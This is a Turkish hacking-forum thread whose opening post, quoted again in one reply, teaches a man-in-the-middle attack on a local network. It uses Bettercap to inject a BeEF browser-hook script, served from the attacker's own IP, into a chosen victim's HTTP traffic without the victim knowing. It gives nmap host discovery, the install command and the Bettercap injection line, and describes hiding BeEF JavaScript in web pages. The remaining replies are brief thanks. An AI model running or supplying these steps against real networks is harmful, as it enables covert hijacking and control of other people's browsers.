İPUCU

Linux Linux İle İlgili Bilgi Paylaşım Platformu

Seçenekler

BeEF Framework Ve Bettercap Kullanımı (Part-1)

15-08-2018 13:25
#1
theokeleS - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
05/2018
Mesajlar:
1.358
Teşekkür (Etti):
68
Teşekkür (Aldı):
357
Konular:
31
Ticaret:
(0) %

Bugün sizlere Beef Framework Kullanımını Anlatacağım ..Bu konuda sadece Beef`in kullanımı açısından genel bir bakış yapacağız ve yerel ağ`a Beef ile nasıl Mitm saldırısı yapabileceğinizi göstereceğim part-2 de ise dış ağ için gerekli ayarların yapılması IP adresi yerine Beef`i Duckdns adresi ile kullanmayı ve port açılması gibi işlemler olacak.
Beef Nedir ?
Beef bir tarayıcı Exploitidir.Herhangi bir web site kodlarının içine Beef`i çalıştıran JavaScript kodlarını gizliyoruz.Böylece kurban bizim Web sitemize girdiği zaman Beef`i çalıştıran JavaScript kodlarıda çalışıyor ve Beef panelinde kurban online oluyor.
Beef ile saldırmanın iki yolu vardır.
1.Mitm Saldırı(Sadece Yerel Ağ İçin)
2.Web sitemizin kodlarının içine gizleyerek(Dış Ağ İçin
Bizim bugün ki konumuz Yerel Ağlar için.İlk başta Beef`i biraz kullanıyoruz ve Beef`in çalışma mantığını anlıyoruz.Yani Beef konusunda biraz uzmanlaşmadan kimseye saldırmıyoruz.Local ağımıza basit bir index.html Hazırlıyoruz ve Videodaki Beef kodlarını index.html sayfamızın içine gömüyoruz.Daha sonra
Service Apache2 Startdiyerek local ağımızı,bizimle birlikte yerel ağımızda bulunan diğer bilgisayarlara açıyoruz.
Yerel Ağa Saldırmakta İkiye Ayrılır.
1.Yöntem : Yerel ağınızda gözünüze kestirdiğiniz bir kurbanı kandırarak,Sizin local ağınızdaki,Kurduğu Web sitesine bakmasını sağlamak.
2.Yöntem İse Şudur: Local ağınıza hiçbir site kurmadan ,Bettercap programı ile yerel ağınızdaki bir kurbana Mitm saldırı yaparak Beef`i Çalıştıracak url adresini Enjeckte etmek(Önerilir)
Şimdi neden kurbana haber verip gel local ağımdaki Web siteme gir diyelim ki?Haber vermedende bunu yapabiliyoruz.
Bunun için Bettercap programını kullanacağız.Bettercap`ı bilgisayarınıza kurmak için Terminale

Apt-Get İnstall Bettercap
yazmamız yeterlidir.Kurbanın IP adresini nasıl bulurum derseniz.Terminali açın ve Nmap 192.168.1.0/24
Komutu ile Local ağınızdaki bütün IP adreslerini görebilirsiniz.Şimdi Bettercap programı ile Beef url adresinini kurbanın bağlantısına nasıl Enjekte edebileceğinizi göstereyim.
Bettercap -T Kurbanın_IP --Proxy-Module İnjeckts--Js-Url"http://kendi_IP_Adresiniz:3000/hook.js"
Evet artık yerel ağınızdaki kurban,Http uzantılı hangi siteye girerse girsin Beef panelinde Online olacaktır.Yanlız Http Protokolü ile girdiği siteden çıkarsa Beef panelindeki bağlantıda gider.Fakat Http Protokolü ile tekrar farklı bir siteye girerse yine Beef panelinde Online gözükecektir
Video bana ait değildir

Konu theokeleS tarafından (18-08-2018 08:22 Saat 08:22 ) değiştirilmiştir.
Hichigo Teşekkür etti.

15-08-2018 13:50
#2
XEmareX - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
05/2018
Nereden:
Amerika
Mesajlar:
1.403
Teşekkür (Etti):
56
Teşekkür (Aldı):
102
Konular:
52
Ticaret:
(0) %
Eline Saglik Anlatim Güzel
15-08-2018 14:32
#3
TULPAR!/ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Nereden:
Sakarya
Yaş:
21
Mesajlar:
3.176
Teşekkür (Etti):
2573
Teşekkür (Aldı):
1065
Konular:
273
Ticaret:
(0) %
Eline sağlık
Kullanıcı İmzası
[CENTER]Unutmayın ki Ufak Dokunuşlar Her Zaman Büyük Önem Taşır
15-08-2018 14:52
#4
Bykurabiye - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2016
Nereden:
Tanrı Dağı
Yaş:
16
Mesajlar:
2.506
Teşekkür (Etti):
343
Teşekkür (Aldı):
259
Konular:
153
Ticaret:
(0) %
Eline sağlık güzel konu
16-08-2018 01:01
#5
Hichigo - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2015
Nereden:
~/
Mesajlar:
956
Teşekkür (Etti):
469
Teşekkür (Aldı):
421
Konular:
128
Ticaret:
(0) %
Eline sağlık
17-08-2018 00:29
#6
tommy112 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2007
Mesajlar:
291
Teşekkür (Etti):
21
Teşekkür (Aldı):
63
Konular:
97
Ticaret:
(0) %
Alıntı:
theokeleS´isimli üyeden Alıntı Mesajı göster

Bugün sizlere Beef Framework Kullanımını Anlatacağım .Bu konuyu açarken Part-1 olarak ayırdım çünki yakın zamanda part 2 halindede yayınlayacağım.Bu konuda sadece Beef`in kullanımı açısından genel bir bakış yapacağız ve yerel ağ`a Beef ile nasıl Mitm saldırısı yapabileceğinizi göstereceğim part-2 de ise dış ağ için gerekli ayarların yapılması IP adresi yerine Beef`i Duckdns adresi ile kullanmayı ve port açılması gibi işlemler olacak.
Beef Nedir ?
Beef bir tarayıcı Exploitidir.Herhangi bir web site kodlarının içine Beef`i çalıştıran JavaScript kodlarını gizliyoruz.Böylece kurban bizim Web sitemize girdiği zaman Beef`i çalıştıran JavaScript kodlarıda çalışıyor ve Beef panelinde kurban online oluyor.
Beef ile saldırmanın iki yolu vardır.
1.Mitm Saldırı(Sadece Yerel Ağ İçin)
2.Web sitemizin kodlarının içine gizleyerek(Dış Ağ İçin
Bizim bugün ki konumuz Yerel Ağlar için.İlk başta Beef`i biraz kullanıyoruz ve Beef`in çalışma mantığını anlıyoruz.Yani Beef konusunda biraz uzmanlaşmadan kimseye saldırmıyoruz.Local ağımıza basit bir index.html Hazırlıyoruz ve Videodaki Beef kodlarını index.html sayfamızın içine gömüyoruz.Daha sonra
Service Apache2 Startdiyerek local ağımızı,bizimle birlikte yerel ağımızda bulunan diğer bilgisayarlara açıyoruz.
Yerel Ağa Saldırmakta İkiye Ayrılır.
1.Yöntem : Yerel ağınızda gözünüze kestirdiğiniz bir kurbanı kandırarak,Sizin local ağınızdaki,Kurduğu Web sitesine bakmasını sağlamak.
2.Yöntem İse Şudur: Local ağınıza hiçbir site kurmadan ,Bettercap programı ile yerel ağınızdaki bir kurbana Mitm saldırı yaparak Beef`i Çalıştıracak url adresini Enjeckte etmek(Önerilir)
Şimdi neden kurbana haber verip gel local ağımdaki Web siteme gir diyelim ki?Haber vermedende bunu yapabiliyoruz.
Bunun için Bettercap programını kullanacağız.Bettercap`ı bilgisayarınıza kurmak için Terminale

Apt-Get İnstall Bettercap
yazmamız yeterlidir.Kurbanın IP adresini nasıl bulurum derseniz.Terminali açın ve Nmap 192.168.1.0/24
Komutu ile Local ağınızdaki bütün IP adreslerini görebilirsiniz.Şimdi Bettercap programı ile Beef url adresinini kurbanın bağlantısına nasıl Enjekte edebileceğinizi göstereyim.
Bettercap -T Kurbanın_IP --Proxy-Module İnjeckts--Js-Url"http://kendi_IP_Adresiniz:3000/hook.js"
Evet artık yerel ağınızdaki kurban,Http uzantılı hangi siteye girerse girsin Beef panelinde Online olacaktır.Yanlız Http Protokolü ile girdiği siteden çıkarsa Beef panelindeki bağlantıda gider.Fakat Http Protokolü ile tekrar farklı bir siteye girerse yine Beef panelinde Online gözükecektir
Video bana ait değildir

https://www.youtube.com/watch?v=mT4wRaTGMn8&t=8s
Kardeşim eline sağlık . Video bana ait.
17-08-2018 00:48
#7
tommy112 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2007
Mesajlar:
291
Teşekkür (Etti):
21
Teşekkür (Aldı):
63
Konular:
97
Ticaret:
(0) %
Alıntı:
theokeleS´isimli üyeden Alıntı Mesajı göster
Teşekkür ederim varol
Eyvallah sağol kardeşim
28-08-2018 01:06
#8
erman147 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2013
Nereden:
YALNIZLIK
Mesajlar:
666
Teşekkür (Etti):
45
Teşekkür (Aldı):
70
Konular:
97
Ticaret:
(0) %
dostum bu beef ve bettercapın olayı nedir beynimi videoya yormak istemiyorum yada yazdıklarına gece gece basmıyor biraz eline sağlık yararlı dikkatimide çeken bir konu.
Kullanıcı İmzası
Kimi insan için GÜN erken başlar, Kimi insan içinse GECE geç biter. Benim için sabahların olmadığı bir geceden herkeze GÜNAYDIN..

%70 C#
%50 SQL
%70 Access
%60 HTML
%80 Sosyal Mühendislik
%70 Photoshop

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı